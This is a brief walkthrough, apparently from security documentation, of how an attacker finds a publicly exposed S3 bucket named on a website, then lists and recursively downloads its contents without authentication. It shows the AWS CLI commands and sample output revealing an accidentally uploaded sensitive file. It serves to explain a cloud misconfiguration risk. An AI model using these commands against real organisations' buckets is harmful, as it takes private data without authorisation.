Publicly Exposed S3 Bucket Leading to Data Leakage
-
Identify the S3 Bucket Name on a Public Website
- An attacker discovers the name of an S3 bucket exposed on a public website.
- Example: The website references the bucket name
public-resources-bucket.
-
Access the Bucket Without Authentication
- Since the bucket is public, the attacker uses the following command to list its contents:
aws s3 ls s3://[bucketName] --no-sign-request - Output: The bucket contains the following files, including sensitive information accidentally uploaded:
2024-12-10 12:34:56 1024 public-file1.txt
2024-12-10 12:35:00 2048 public-file2.png
2024-12-10 12:35:10 1048576 sensitive-data.csv
- Since the bucket is public, the attacker uses the following command to list its contents:
-
Download the Contents of the Bucket
- The attacker downloads the bucket's contents using the following command:
aws s3 cp s3://[bucketName] ./local-directory --recursive --no-sign-request - Result: The attacker gains access to both the publicly intended files and the accidentally exposed sensitive information, such as
sensitive-data.csv.
- The attacker downloads the bucket's contents using the following command: